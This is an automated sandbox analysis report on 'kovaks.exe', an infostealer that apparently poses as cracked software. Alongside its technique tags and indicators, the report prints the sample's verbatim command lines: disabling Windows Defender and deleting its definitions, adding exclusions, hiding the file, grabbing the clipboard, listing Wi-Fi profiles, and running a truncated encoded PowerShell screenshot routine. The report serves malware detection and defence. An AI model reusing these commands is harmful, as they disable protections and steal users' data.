cc5428bae6618b177dab013b8fedce5c389e72850a6fd2af9e20112743f6859b

Analysis

max time kernel
20s
max time network
22s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
19/12/2024, 12:29

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

kovaks.exe
Size

7.4MB
MD5

6873f30c0eba5250298b8cff4cae3219
SHA1

3d469ef32cf575ad30b49e37fb361d05f7a9f228
SHA256

cc5428bae6618b177dab013b8fedce5c389e72850a6fd2af9e20112743f6859b
SHA512

140d31205fd6032f4936b3016fb3e641a93f34fa43d23db10e0cf2dd5ed5ea10819ca9b373eae1059b642d687e0e302fd172949b5f06bfb61cd2f6344875360f
SSDEEP

98304:cbSibq7LA45urErvz81LpWjjUa50ZtPvYRt2e4GFNGjfzfbIbApJo4E4TEGAuThA:cOMJwurErvI9pWjgfPvzm6gsFE4Th9y

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
3628	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
456	powershell.exe
4520	powershell.exe
3868	powershell.exe
3780	powershell.exe
3792	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	kovaks.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3776	cmd.exe
548	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3184	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2340	kovaks.exe
2340	kovaks.exe
2340	kovaks.exe
2340	kovaks.exe
2340	kovaks.exe
2340	kovaks.exe
2340	kovaks.exe
2340	kovaks.exe
2340	kovaks.exe
2340	kovaks.exe
2340	kovaks.exe
2340	kovaks.exe
2340	kovaks.exe
2340	kovaks.exe
2340	kovaks.exe
2340	kovaks.exe
2340	kovaks.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
22	discord.com
23	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
20	ip-api.com
12	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
1472	tasklist.exe
4988	tasklist.exe
4424	tasklist.exe
640	tasklist.exe
5028	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4368	cmd.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00280000000460cd-21.dat	upx
behavioral1/memory/2340-25-0x00007FFFB9A20000-0x00007FFFBA012000-memory.dmp	upx
behavioral1/files/0x00280000000460c0-27.dat	upx
behavioral1/files/0x00280000000460cb-29.dat	upx
behavioral1/memory/2340-30-0x00007FFFC82F0000-0x00007FFFC8314000-memory.dmp	upx
behavioral1/files/0x00280000000460c7-47.dat	upx
behavioral1/files/0x00280000000460c6-46.dat	upx
behavioral1/files/0x00280000000460c5-45.dat	upx
behavioral1/files/0x00280000000460c4-44.dat	upx
behavioral1/files/0x00280000000460c3-43.dat	upx
behavioral1/files/0x00280000000460c2-42.dat	upx
behavioral1/files/0x00280000000460c1-41.dat	upx
behavioral1/files/0x00280000000460bf-40.dat	upx
behavioral1/files/0x00280000000460d2-39.dat	upx
behavioral1/files/0x00280000000460d1-38.dat	upx
behavioral1/files/0x00280000000460d0-37.dat	upx
behavioral1/files/0x00280000000460cc-34.dat	upx
behavioral1/memory/2340-48-0x00007FFFD25B0000-0x00007FFFD25BF000-memory.dmp	upx
behavioral1/files/0x00280000000460ca-33.dat	upx
behavioral1/memory/2340-54-0x00007FFFC82C0000-0x00007FFFC82ED000-memory.dmp	upx
behavioral1/memory/2340-56-0x00007FFFC8440000-0x00007FFFC8459000-memory.dmp	upx
behavioral1/memory/2340-58-0x00007FFFC7760000-0x00007FFFC7783000-memory.dmp	upx
behavioral1/memory/2340-60-0x00007FFFB9760000-0x00007FFFB98DE000-memory.dmp	upx
behavioral1/memory/2340-62-0x00007FFFC85C0000-0x00007FFFC85D9000-memory.dmp	upx
behavioral1/memory/2340-64-0x00007FFFD0830000-0x00007FFFD083D000-memory.dmp	upx
behavioral1/memory/2340-66-0x00007FFFC8580000-0x00007FFFC85B3000-memory.dmp	upx
behavioral1/memory/2340-71-0x00007FFFB9950000-0x00007FFFB9A1D000-memory.dmp	upx
behavioral1/memory/2340-70-0x00007FFFB9A20000-0x00007FFFBA012000-memory.dmp	upx
behavioral1/memory/2340-74-0x00007FFFC82F0000-0x00007FFFC8314000-memory.dmp	upx
behavioral1/memory/2340-73-0x00007FFFB8EE0000-0x00007FFFB9409000-memory.dmp	upx
behavioral1/memory/2340-79-0x00007FFFCDA90000-0x00007FFFCDA9D000-memory.dmp	upx
behavioral1/memory/2340-81-0x00007FFFC8440000-0x00007FFFC8459000-memory.dmp	upx
behavioral1/memory/2340-82-0x00007FFFB9500000-0x00007FFFB961C000-memory.dmp	upx
behavioral1/memory/2340-78-0x00007FFFC82C0000-0x00007FFFC82ED000-memory.dmp	upx
behavioral1/memory/2340-76-0x00007FFFC8560000-0x00007FFFC8574000-memory.dmp	upx
behavioral1/memory/2340-103-0x00007FFFC7760000-0x00007FFFC7783000-memory.dmp	upx
behavioral1/memory/2340-113-0x00007FFFB9760000-0x00007FFFB98DE000-memory.dmp	upx
behavioral1/memory/2340-193-0x00007FFFC85C0000-0x00007FFFC85D9000-memory.dmp	upx
behavioral1/memory/2340-290-0x00007FFFC8580000-0x00007FFFC85B3000-memory.dmp	upx
behavioral1/memory/2340-294-0x00007FFFB9950000-0x00007FFFB9A1D000-memory.dmp	upx
behavioral1/memory/2340-308-0x00007FFFB8EE0000-0x00007FFFB9409000-memory.dmp	upx
behavioral1/memory/2340-320-0x00007FFFB9A20000-0x00007FFFBA012000-memory.dmp	upx
behavioral1/memory/2340-326-0x00007FFFB9760000-0x00007FFFB98DE000-memory.dmp	upx
behavioral1/memory/2340-321-0x00007FFFC82F0000-0x00007FFFC8314000-memory.dmp	upx
behavioral1/memory/2340-362-0x00007FFFD25B0000-0x00007FFFD25BF000-memory.dmp	upx
behavioral1/memory/2340-365-0x00007FFFC7760000-0x00007FFFC7783000-memory.dmp	upx
behavioral1/memory/2340-364-0x00007FFFC8440000-0x00007FFFC8459000-memory.dmp	upx
behavioral1/memory/2340-363-0x00007FFFC82C0000-0x00007FFFC82ED000-memory.dmp	upx
behavioral1/memory/2340-361-0x00007FFFC82F0000-0x00007FFFC8314000-memory.dmp	upx
behavioral1/memory/2340-360-0x00007FFFB8EE0000-0x00007FFFB9409000-memory.dmp	upx
behavioral1/memory/2340-359-0x00007FFFB9500000-0x00007FFFB961C000-memory.dmp	upx
behavioral1/memory/2340-358-0x00007FFFCDA90000-0x00007FFFCDA9D000-memory.dmp	upx
behavioral1/memory/2340-357-0x00007FFFC8560000-0x00007FFFC8574000-memory.dmp	upx
behavioral1/memory/2340-355-0x00007FFFB9950000-0x00007FFFB9A1D000-memory.dmp	upx
behavioral1/memory/2340-354-0x00007FFFC8580000-0x00007FFFC85B3000-memory.dmp	upx
behavioral1/memory/2340-353-0x00007FFFD0830000-0x00007FFFD083D000-memory.dmp	upx
behavioral1/memory/2340-352-0x00007FFFC85C0000-0x00007FFFC85D9000-memory.dmp	upx
behavioral1/memory/2340-351-0x00007FFFB9760000-0x00007FFFB98DE000-memory.dmp	upx
behavioral1/memory/2340-345-0x00007FFFB9A20000-0x00007FFFBA012000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2096	cmd.exe
3232	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3780	cmd.exe
520	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1516	WMIC.exe
2092	WMIC.exe
4052	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3456	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3232	PING.EXE

Suspicious behavior: EnumeratesProcesses 52 IoCs

pid	Process
3868	powershell.exe
456	powershell.exe
688	WMIC.exe
688	WMIC.exe
688	WMIC.exe
688	WMIC.exe
456	powershell.exe
3868	powershell.exe
1516	WMIC.exe
1516	WMIC.exe
1516	WMIC.exe
1516	WMIC.exe
2092	WMIC.exe
2092	WMIC.exe
2092	WMIC.exe
2092	WMIC.exe
4520	powershell.exe
4520	powershell.exe
1112	WMIC.exe
1112	WMIC.exe
1112	WMIC.exe
1112	WMIC.exe
548	powershell.exe
548	powershell.exe
2708	powershell.exe
2708	powershell.exe
548	powershell.exe
2708	powershell.exe
3780	powershell.exe
3780	powershell.exe
4800	powershell.exe
4800	powershell.exe
5096	WMIC.exe
5096	WMIC.exe
5096	WMIC.exe
5096	WMIC.exe
2400	WMIC.exe
2400	WMIC.exe
2400	WMIC.exe
2400	WMIC.exe
3148	WMIC.exe
3148	WMIC.exe
3148	WMIC.exe
3148	WMIC.exe
3792	powershell.exe
3792	powershell.exe
4052	WMIC.exe
4052	WMIC.exe
4052	WMIC.exe
4052	WMIC.exe
548	powershell.exe
548	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3868	powershell.exe
Token: SeDebugPrivilege	456	powershell.exe
Token: SeIncreaseQuotaPrivilege	688	WMIC.exe
Token: SeSecurityPrivilege	688	WMIC.exe
Token: SeTakeOwnershipPrivilege	688	WMIC.exe
Token: SeLoadDriverPrivilege	688	WMIC.exe
Token: SeSystemProfilePrivilege	688	WMIC.exe
Token: SeSystemtimePrivilege	688	WMIC.exe
Token: SeProfSingleProcessPrivilege	688	WMIC.exe
Token: SeIncBasePriorityPrivilege	688	WMIC.exe
Token: SeCreatePagefilePrivilege	688	WMIC.exe
Token: SeBackupPrivilege	688	WMIC.exe
Token: SeRestorePrivilege	688	WMIC.exe
Token: SeShutdownPrivilege	688	WMIC.exe
Token: SeDebugPrivilege	688	WMIC.exe
Token: SeSystemEnvironmentPrivilege	688	WMIC.exe
Token: SeRemoteShutdownPrivilege	688	WMIC.exe
Token: SeUndockPrivilege	688	WMIC.exe
Token: SeManageVolumePrivilege	688	WMIC.exe
Token: 33	688	WMIC.exe
Token: 34	688	WMIC.exe
Token: 35	688	WMIC.exe
Token: 36	688	WMIC.exe
Token: SeDebugPrivilege	1472	tasklist.exe
Token: SeIncreaseQuotaPrivilege	688	WMIC.exe
Token: SeSecurityPrivilege	688	WMIC.exe
Token: SeTakeOwnershipPrivilege	688	WMIC.exe
Token: SeLoadDriverPrivilege	688	WMIC.exe
Token: SeSystemProfilePrivilege	688	WMIC.exe
Token: SeSystemtimePrivilege	688	WMIC.exe
Token: SeProfSingleProcessPrivilege	688	WMIC.exe
Token: SeIncBasePriorityPrivilege	688	WMIC.exe
Token: SeCreatePagefilePrivilege	688	WMIC.exe
Token: SeBackupPrivilege	688	WMIC.exe
Token: SeRestorePrivilege	688	WMIC.exe
Token: SeShutdownPrivilege	688	WMIC.exe
Token: SeDebugPrivilege	688	WMIC.exe
Token: SeSystemEnvironmentPrivilege	688	WMIC.exe
Token: SeRemoteShutdownPrivilege	688	WMIC.exe
Token: SeUndockPrivilege	688	WMIC.exe
Token: SeManageVolumePrivilege	688	WMIC.exe
Token: 33	688	WMIC.exe
Token: 34	688	WMIC.exe
Token: 35	688	WMIC.exe
Token: 36	688	WMIC.exe
Token: SeIncreaseQuotaPrivilege	456	powershell.exe
Token: SeSecurityPrivilege	456	powershell.exe
Token: SeTakeOwnershipPrivilege	456	powershell.exe
Token: SeLoadDriverPrivilege	456	powershell.exe
Token: SeSystemProfilePrivilege	456	powershell.exe
Token: SeSystemtimePrivilege	456	powershell.exe
Token: SeProfSingleProcessPrivilege	456	powershell.exe
Token: SeIncBasePriorityPrivilege	456	powershell.exe
Token: SeCreatePagefilePrivilege	456	powershell.exe
Token: SeBackupPrivilege	456	powershell.exe
Token: SeRestorePrivilege	456	powershell.exe
Token: SeShutdownPrivilege	456	powershell.exe
Token: SeDebugPrivilege	456	powershell.exe
Token: SeSystemEnvironmentPrivilege	456	powershell.exe
Token: SeRemoteShutdownPrivilege	456	powershell.exe
Token: SeUndockPrivilege	456	powershell.exe
Token: SeManageVolumePrivilege	456	powershell.exe
Token: 33	456	powershell.exe
Token: 34	456	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3508 wrote to memory of 2340	3508	kovaks.exe	82
PID 3508 wrote to memory of 2340	3508	kovaks.exe	82
PID 2340 wrote to memory of 4056	2340	kovaks.exe	84
PID 2340 wrote to memory of 4056	2340	kovaks.exe	84
PID 2340 wrote to memory of 4004	2340	kovaks.exe	85
PID 2340 wrote to memory of 4004	2340	kovaks.exe	85
PID 2340 wrote to memory of 3256	2340	kovaks.exe	86
PID 2340 wrote to memory of 3256	2340	kovaks.exe	86
PID 2340 wrote to memory of 4664	2340	kovaks.exe	90
PID 2340 wrote to memory of 4664	2340	kovaks.exe	90
PID 2340 wrote to memory of 3108	2340	kovaks.exe	92
PID 2340 wrote to memory of 3108	2340	kovaks.exe	92
PID 4056 wrote to memory of 456	4056	cmd.exe	94
PID 4056 wrote to memory of 456	4056	cmd.exe	94
PID 4004 wrote to memory of 3868	4004	cmd.exe	95
PID 4004 wrote to memory of 3868	4004	cmd.exe	95
PID 4664 wrote to memory of 1472	4664	cmd.exe	96
PID 4664 wrote to memory of 1472	4664	cmd.exe	96
PID 3108 wrote to memory of 688	3108	cmd.exe	97
PID 3108 wrote to memory of 688	3108	cmd.exe	97
PID 3256 wrote to memory of 1956	3256	cmd.exe	98
PID 3256 wrote to memory of 1956	3256	cmd.exe	98
PID 2340 wrote to memory of 3332	2340	kovaks.exe	101
PID 2340 wrote to memory of 3332	2340	kovaks.exe	101
PID 3332 wrote to memory of 984	3332	cmd.exe	161
PID 3332 wrote to memory of 984	3332	cmd.exe	161
PID 2340 wrote to memory of 5020	2340	kovaks.exe	104
PID 2340 wrote to memory of 5020	2340	kovaks.exe	104
PID 5020 wrote to memory of 3176	5020	cmd.exe	106
PID 5020 wrote to memory of 3176	5020	cmd.exe	106
PID 4004 wrote to memory of 3628	4004	cmd.exe	107
PID 4004 wrote to memory of 3628	4004	cmd.exe	107
PID 2340 wrote to memory of 1284	2340	kovaks.exe	108
PID 2340 wrote to memory of 1284	2340	kovaks.exe	108
PID 1284 wrote to memory of 1516	1284	cmd.exe	165
PID 1284 wrote to memory of 1516	1284	cmd.exe	165
PID 2340 wrote to memory of 4828	2340	kovaks.exe	111
PID 2340 wrote to memory of 4828	2340	kovaks.exe	111
PID 4828 wrote to memory of 2092	4828	cmd.exe	113
PID 4828 wrote to memory of 2092	4828	cmd.exe	113
PID 2340 wrote to memory of 4368	2340	kovaks.exe	114
PID 2340 wrote to memory of 4368	2340	kovaks.exe	114
PID 2340 wrote to memory of 4400	2340	kovaks.exe	116
PID 2340 wrote to memory of 4400	2340	kovaks.exe	116
PID 4368 wrote to memory of 2932	4368	cmd.exe	118
PID 4368 wrote to memory of 2932	4368	cmd.exe	118
PID 4400 wrote to memory of 4520	4400	cmd.exe	119
PID 4400 wrote to memory of 4520	4400	cmd.exe	119
PID 2340 wrote to memory of 2492	2340	kovaks.exe	120
PID 2340 wrote to memory of 2492	2340	kovaks.exe	120
PID 2340 wrote to memory of 100	2340	kovaks.exe	121
PID 2340 wrote to memory of 100	2340	kovaks.exe	121
PID 100 wrote to memory of 4988	100	cmd.exe	124
PID 100 wrote to memory of 4988	100	cmd.exe	124
PID 2492 wrote to memory of 4424	2492	cmd.exe	125
PID 2492 wrote to memory of 4424	2492	cmd.exe	125
PID 2340 wrote to memory of 3856	2340	kovaks.exe	126
PID 2340 wrote to memory of 3856	2340	kovaks.exe	126
PID 2340 wrote to memory of 3776	2340	kovaks.exe	127
PID 2340 wrote to memory of 3776	2340	kovaks.exe	127
PID 2340 wrote to memory of 4924	2340	kovaks.exe	129
PID 2340 wrote to memory of 4924	2340	kovaks.exe	129
PID 2340 wrote to memory of 3284	2340	kovaks.exe	131
PID 2340 wrote to memory of 3284	2340	kovaks.exe	131

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2932	attrib.exe
2856	attrib.exe
2164	attrib.exe

C:\Users\Admin\AppData\Local\Temp\kovaks.exe
"C:\Users\Admin\AppData\Local\Temp\kovaks.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3508
- C:\Users\Admin\AppData\Local\Temp\kovaks.exe
  "C:\Users\Admin\AppData\Local\Temp\kovaks.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\kovaks.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4056
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\kovaks.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4004
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3868
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:3628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('no hay problema con el pc, esta mal crackeado', 0, 'algo de la apliacion esta mal programado', 48+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3256
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('no hay problema con el pc, esta mal crackeado', 0, 'algo de la apliacion esta mal programado', 48+16);close()"
      4⤵
      PID:1956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4664
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3108
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3332
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5020
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:3176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1284
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:1516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4828
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:2092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\kovaks.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:4368
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\kovaks.exe"
      4⤵
      Views/modifies file attributes
      PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ ‎.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4400
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ ‎.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2492
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:100
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:3856
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3776
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4924
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3284
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3780
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:4048
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:4252
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAg